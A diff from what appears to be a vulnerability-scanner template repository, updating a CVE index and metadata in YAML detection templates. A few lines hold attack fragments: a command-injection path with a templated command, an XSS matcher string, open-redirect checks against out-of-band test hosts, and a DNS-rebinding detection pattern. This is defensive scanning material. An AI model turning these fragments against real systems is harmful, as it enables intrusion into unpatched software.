{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"}
{"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
{"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"}
{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"medium","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the sorting parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
@ -2298,6 +2303,7 @@
{"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"}
{"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"}
{"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"}
{"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"}
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}

View File

@ -1 +1 @@
eb2a2554dd005ef35adf0ff115ae4913
d1c0809e63305403ca431401cfcebe07

View File

@ -1,5 +1,4 @@
id: dns-rebinding
info:
name: DNS Rebinding Attack
author: ricardomaia
@ -10,6 +9,8 @@ info:
- https://capec.mitre.org/data/definitions/275.html
- https://payatu.com/blog/dns-rebinding/
- https://heimdalsecurity.com/blog/dns-rebinding/
metadata:
max-request: 2
tags: redirect,dns,network
dns:
@ -20,7 +21,7 @@ dns:
- type: regex
part: answer
regex:
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
- 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
extractors:
- type: regex
@ -28,35 +29,22 @@ dns:
name: IPv4
group: 1
regex:
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
- 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
- name: "{{FQDN}}"
type: AAAA
matchers:
# IPv6 Compressed
# IPv6 Compressed and Full
- type: regex
part: answer
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
# IPv6
- type: regex
part: answer
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
- "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
extractors:
- type: regex
part: answer
name: IPv6_Compressed
name: IPv6_ULA
group: 1
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
- type: regex
part: answer
name: IPv6
group: 1
regex:
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
# digest: 4a0a004730450221009a895344f0f4bf8d0444566a7a2392d2074708d88d29a0922ebb71935290785702200a338fe1517c225d45750b08f80f3a903cd5925a32c542b5559f0202173732be:922c64590222798bb761d5b6d8e72950
- "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
# digest: 4b0a00483046022100f31fd9369022bcafe6da846b246069391f1c22137b8024bb71905634ffa56673022100ea3679256b9518c8853b42432e216d4da6ff3e88ebee349b67e8e8ba7d8a13e1:922c64590222798bb761d5b6d8e72950

View File

@ -1,4 +1,4 @@
id: linkedin-client-id
id: linkedin-id
info:
name: Linkedin Client ID

View File

@ -20,7 +20,7 @@ info:
cve-id: CVE-2018-25031
cwe-id: CWE-20
epss-score: 0.00265
epss-percentile: 0.64105
epss-percentile: 0.65414
cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
metadata:
verified: true
@ -30,7 +30,6 @@ info:
shodan-query: http.component:"Swagger"
fofa-query: icon_hash="-1180440057"
tags: headless,cve,cve2018,swagger,xss,smartbear
headless:
- steps:
- args:
@ -71,4 +70,4 @@ headless:
words:
- "swagger"
case-insensitive: true
# digest: 4a0a00473045022013f081ac9ee7ec2705ebf232439f9b18c17b162f4e3bfc4485638f324af817df022100e3e262210320011237b59f2a16f32a64e4ad8aba204a3c0f23a4ecda48368644:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220276c4920b8b15fde2802ab2d829106243bfa1d1b5eec02e3ea13925bb1a2367f022012c9b9cb6e5b2906f68da10c6d0aa5c7462f847f906fc82ae576ac26db37fbbb:922c64590222798bb761d5b6d8e72950

View File

@ -20,8 +20,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2014-6271
cwe-id: CWE-78
epss-score: 0.97564
epss-percentile: 0.99999
epss-score: 0.97559
epss-percentile: 0.99997
cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
metadata:
max-request: 8
@ -58,4 +58,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502203c32ed699b5b5784b8f6eddd60a3c06b1a1c8dbefd3024f425307f8f793e0f64022100e4987775a712348ab69dbb368677664e21d2d753a3ba22ab15c2dcd0d426cf49:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022022d9c0adae74cdc979a9807c7b6c229b34bbaf77fdf9fb5edbd4263a3e3d939d022100bff54d932fc7f8bc11b979b2289b87a588833b45578f1945d5e8dc9a7021354b:922c64590222798bb761d5b6d8e72950

View File

@ -21,7 +21,7 @@ info:
cve-id: CVE-2014-8799
cwe-id: CWE-22
epss-score: 0.17844
epss-percentile: 0.95686
epss-percentile: 0.96002
cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@ -50,4 +50,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502206a7436cc97bf8ecebcb667d7af15dcf23669c6fe4558d8041af31eb305bc605e022100f724c31ae974833f30f077f071146f044c59dd077af802bcc254aaa7e7f82ee2:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100c44ca338e0e27aef8473eed734aaf201ffdbd8635955e4b8e4cbfb37f596bd5802202fa69ab04ca34891ed8896145cbd8e1af1443228c1e766e1cc8f6591c0e74f45:922c64590222798bb761d5b6d8e72950

View File

@ -20,8 +20,8 @@ info:
cvss-score: 9.8
cve-id: CVE-2018-17431
cwe-id: CWE-287
epss-score: 0.11315
epss-percentile: 0.94677
epss-score: 0.11416
epss-percentile: 0.95073
cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*
metadata:
max-request: 2
@ -50,4 +50,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502206e56a0d536dfc8d4ed10ae0505f2d2548b6c986854d0813c6e8185acc66756d9022100e74e57bbb9b04d2860f174d0f9effbef03a265a0ada954ea317f3fffa89a12ca:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100b58e1f2764198a04cdc831884ce49a67189b6a1988fcf7e27f9d82ed83cd2a3402206c36044d3ad9e30032c1e67d471ee256bb7602b09812ffc7830995d5808c7ff1:922c64590222798bb761d5b6d8e72950

View File

@ -15,13 +15,14 @@ info:
- https://wordpress.org/plugins/jsmol2wp/
- https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
- https://nvd.nist.gov/vuln/detail/CVE-2018-20463
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-20463
cwe-id: CWE-22
epss-score: 0.01939
epss-percentile: 0.87393
epss-percentile: 0.88289
cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:*
metadata:
verified: true
@ -53,4 +54,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502205f9aeadd874f5fdf363e87acc0ec34f995e53677d28cbc33b27cf113d9de2b03022100c5b000d74f0180cb372d2dd355622f03e7cb2b5180ac3cb0e6f0660049f49dba:922c64590222798bb761d5b6d8e72950
# digest: 4b0a004830460221008b0f6a4e144ec0a4f5fb0f772930b5da535472e941723be6c675589ac426a8b5022100bef4cc125a636184009e644aeb5fa64c4a868c49d7c081e63409ed228515e3ed:922c64590222798bb761d5b6d8e72950

View File

@ -20,8 +20,8 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-24223
cwe-id: CWE-79
epss-score: 0.00976
epss-percentile: 0.81758
epss-score: 0.0069
epss-percentile: 0.79602
cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*
metadata:
max-request: 1
@ -49,4 +49,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100c973b82339421ec3089eac4ceee54851fb8db56c023e4110994b8c16b279307f022100ba5f5c61a9f8acb6755ba89ca34bb684ee60ac4e1e7c96f40f0688789b22e49a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502203465eb756d9c1c2a642192e678566a419006885438b5721b7a8b54470650a994022100a3b09f8d55baad75a18b6eb7fab36fd7cf976201304457c717358dd7b6fa2862:922c64590222798bb761d5b6d8e72950

View File

@ -14,13 +14,15 @@ info:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
- https://nvd.nist.gov/vuln/detail/CVE-2021-21805
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-21805
cwe-id: CWE-78
epss-score: 0.97374
epss-percentile: 0.99892
epss-percentile: 0.99895
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
metadata:
verified: true
@ -52,4 +54,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a00473045022100f2a3e97b98df27aafb1f8001f577c595d1cbb4fed075db594314502fbf283bd602204b4e9e0d429dacbd3c7672f6fd16118bbc7e73d54077c27d333a19e89ac0f5db:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950

View File

@ -21,7 +21,7 @@ info:
cve-id: CVE-2021-22873
cwe-id: CWE-601
epss-score: 0.00922
epss-percentile: 0.81209
epss-percentile: 0.82474
cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
metadata:
verified: true
@ -49,4 +49,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 490a0046304402206825e5ab8251fc139a7b9f7ac5b06687ca56ae1e65ed767ca11c20c7930c7e1f02205a2f6d3c6d66a885a07cd69568accc9951b72dc883ed9cc1f62f561083da2e0c:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502201f562b389b6a5f97abaafe839123249c8bfc49d20d8cc12c06a61ee23b840795022100e4d6049c15f40c1564d2e55b52873ca91a7030a85feb7605ebf54ce291e513d5:922c64590222798bb761d5b6d8e72950

View File

@ -6,26 +6,26 @@ info:
severity: critical
description: |
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
remediation: Fixed in 3.4.12
reference:
- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24849
- https://wordpress.org/plugins/wc-multivendor-marketplace/
remediation: Fixed in 3.4.12
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24849
cwe-id: CWE-89
cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
epss-score: 0.00199
epss-percentile: 0.56492
cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: wclovers
product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible
product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible"
framework: wordpress
publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
verified: true
max-request: 3
vendor: wclovers
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli
flow: http(1) && http(2)
@ -67,4 +67,4 @@ http:
- 'contains(header, "application/json")'
- 'contains(body, "success")'
condition: and
# digest: 4a0a00473045022100ac9faa851954e06269fcb6c1d2c78475a2f575683ef8f476b96450a5671b359102205d7f4ea4de3b3c6db211c706adcd4be8f13de39a9098990f182b0f2008efc79a:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100ef54cd087054515b6ef2f1935d258ecea55b3abf384cd95798b8cd351a5f1fe90220070a59d1e5a3ab49e8fc248e2ddc238e33958d75f7b3cfc5700b5018b8116f82:922c64590222798bb761d5b6d8e72950

View File

@ -18,8 +18,8 @@ info:
cwe-id: CWE-22
cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
metadata:
max-request: 1
shodan-query: title:"openSIS"
shodan-query: "title:\"openSIS\""
max-request: 2
tags: cve,cve2021,lfi,os4ed,opensis,authenticated
http:
@ -42,4 +42,4 @@ http:
- 'contains(body_1, "openSIS")'
- "status_code == 200"
condition: and
# digest: 490a004630440220206394b303ab92ce65590e2c61e6eb5e9914219a5a0651ae69009a3f224109ff02207e729d1c062d3bd2e445a39a036992cc281564407a764e7f7ced5f02879f1034:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100924b4c785059886c8131bde539e1106c1be30952a7fea88bd992cb9cc3e7aca202204c4c3c880b323df6c23378c766e00dd0222716aa49f384cbc8f4c37b7c9ab38f:922c64590222798bb761d5b6d8e72950

View File

@ -21,7 +21,7 @@ info:
cve-id: CVE-2022-0776
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.40832
epss-percentile: 0.40075
cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:*
metadata:
vendor: revealjs
@ -48,4 +48,4 @@ headless:
part: extract
words:
- "true"
# digest: 4a0a00473045022015776ab1f8ee5f7cbd078059bc34167a0b8ca0a11a1bda34723f7ec03d31b6c302210098d1c6a54ecbafb3158390aea2498590fe70df9d78d3266d388274859a641533:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100822f5151d594a59ff99bde533919eb403ddd05ab8d041ea5963a1c88f81d84320221008c8e17c078665f80ff1f6815e2f071996a8d9e4712b43e3bf775f0c2db3e0e12:922c64590222798bb761d5b6d8e72950

View File

@ -22,7 +22,7 @@ info:
cve-id: CVE-2022-26263
cwe-id: CWE-79
epss-score: 0.00147
epss-percentile: 0.50638
epss-percentile: 0.49633
cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:*
metadata:
verified: true
@ -43,4 +43,4 @@ headless:
- '<frame src="javascript:console.log(document.domain)"'
- 'webhelp4.js'
condition: and
# digest: 4a0a00473045022100a72f95b8648b73eb2e4cf2ea58e09902bdd87b68ed16d6258763f77029657162022064b391ae3ee631c189007bc15526ede89c3be32159ec215d129a1840544b297e:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100c124eb614790888649b3ad794123f8a4d5127efb6b3dfcccc25a1431ae2dd660022100bdd24ef15743a8543fc37ed7a7e4a0399762873c6016d5cd6a811baa514a747d:922c64590222798bb761d5b6d8e72950

View File

@ -22,7 +22,7 @@ info:
cve-id: CVE-2022-30776
cwe-id: CWE-79
epss-score: 0.00112
epss-percentile: 0.44504
epss-percentile: 0.43631
cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
metadata:
verified: true
@ -52,4 +52,4 @@ http:
- type: status
status:
- 200
# digest: 4a0a0047304502203171cb9a5a9125732f06bba74b71efc2e09ae7c92ad33bcca6e6356b5d541fe702210081422e4791a4a926b08807deffab9bf4cb8eab98c0f9897922d586b01218bf06:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950

View File

@ -37,7 +37,7 @@ variables:
http:
- method: GET
path:
- '{{BaseURL}}/doAs?=`{{url_encode("{{command}}")}}`'
- '{{BaseURL}}/?doAs=`{{url_encode("{{command}}")}}`'
matchers-condition: and
matchers:
@ -45,4 +45,4 @@ http:
part: body
words:
- "19833-2202-EVC"
# digest: 4a0a004730450221008bb8dca83860e99f6649206e34e12203a4ef600bbafcd7ae6b135b537faab9990220205c3ed10d667efd9a2e7f2128c855334fab697f0bf55bf5792362c774f88c91:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100c1235eac532c6d726073650001ee75a510e3d2b869c6174b06e4a249f1d236090220564440e9e87fc5f90b25cfc4108c5aa04b592bc0e6c584c01fec85b312622f08:922c64590222798bb761d5b6d8e72950

View File

@ -6,28 +6,29 @@ info:
severity: medium
description: |
RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.
impact: |
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
remediation: |
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
reference:
- https://tenable.com/security/research/tra-2022-30
- https://support.posit.co/hc/en-us/articles/10983374992023-CVE-2022-38131-configuration-issue-in-Posit-Connect
- https://github.com/JoshuaMart/JoshuaMart
impact: |
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
remediation: |
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-38131
cwe-id: CWE-601
cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
epss-score: 0.0006
epss-percentile: 0.23591
cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
metadata:
product: connect
shodan-query: "http.favicon.hash:217119619"
fofa-query: "app=\"RStudio-Connect\""
max-request: 1
verified: true
vendor: rstudio
product: connect
shodan-query: http.favicon.hash:217119619
fofa-query: app="RStudio-Connect"
tags: tenable,cve,cve2022,redirect,rstudio
http:
@ -46,4 +47,4 @@ http:
- type: status
status:
- 307
# digest: 4a0a00473045022100e9632f43574d44779bc09a10a78cb6835cc4b0179a707b395efecda59dcb8b5402205a72129b99d873d786c6aa9062e142a0b02192b31aa930c1a234a6d61558b479:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022100aed598584561fa1188599f4a3fa2ff5ae9149e94b624fef3be306a7a74429c3f02201c02b4ebc6bfa15076a56527dc53df6e0be1e5d7f890dbc1558b26e30d35059b:922c64590222798bb761d5b6d8e72950

View File

@ -18,8 +18,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-4140
cwe-id: CWE-552
epss-score: 0.01317
epss-percentile: 0.84504
epss-score: 0.00932
epss-percentile: 0.82572
cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@ -54,4 +54,4 @@ http:
- type: status
status:
- 200
# digest: 4b0a00483046022100c309f56d1bc6b8b3ad4aeedfea6624e9072d042193f145856563965410ce9e7c022100cc3f6acff92ea09cb461e67964a2e5973fbb82fdd391e5176e287a0be8c759c1:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950

View File

@ -17,7 +17,7 @@ info:
cve-id: CVE-2023-0552
cwe-id: CWE-601
epss-score: 0.00086
epss-percentile: 0.35637
epss-percentile: 0.34914
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@ -38,4 +38,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 4a0a004730450221008eccfd0ecd7398b3566c5cfec47a5d3396899495831dabbee13a144918b2127e0220232a7e35aba58e28f2c38ac75f7f4558d7419e63c82e7b145dba6569f3e52fcf:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402201ab8dcd9693d8e9c7b7e3c2ac162de7610f21d7c3523e623a005ecdeababa57902203039fe388db8f4aef6c49c40a2cff545792484a6dda13261675b612810c874f9:922c64590222798bb761d5b6d8e72950

View File

@ -22,7 +22,7 @@ info:
cve-id: CVE-2023-26255
cwe-id: CWE-22
